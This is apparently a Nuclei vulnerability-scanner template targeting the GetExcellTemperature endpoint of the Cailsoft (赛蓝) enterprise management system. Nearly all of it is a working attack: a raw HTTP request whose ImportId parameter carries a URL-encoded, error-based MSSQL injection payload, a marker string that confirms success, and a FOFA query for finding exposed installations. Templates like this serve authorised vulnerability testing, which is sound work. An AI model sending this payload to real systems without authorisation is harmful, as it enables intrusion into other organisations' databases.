id: cailsoft-GetExcellTemperature-sqli

info:
  name: 赛蓝企业管理系统 GetExcellTemperature SQL注入
  author: god
  severity: high
  description: 赛蓝企业管理系统 GetExcellTemperature SQL注入
  metadata:
    fofa-query: body="www.cailsoft.com"||body="赛蓝企业管理系统"
  tags: 赛蓝企业管理系统

http:
  - raw:
      - |
        @timeout: 30s
        GET /BaseModule/ExcelImport/GetExcellTemperature?ImportId=%27%20AND%206935%20IN%20(SELECT%20(CHAR(113)%2BCHAR(122)%2BCHAR(112)%2BCHAR(106)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(6935%3D6935)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(122)%2BCHAR(113)%2BCHAR(118)%2BCHAR(113)))%20AND%20%27qaq%27=%27qaq HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
        Connection: close


    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - qzpjq1qzqvq
        condition: and
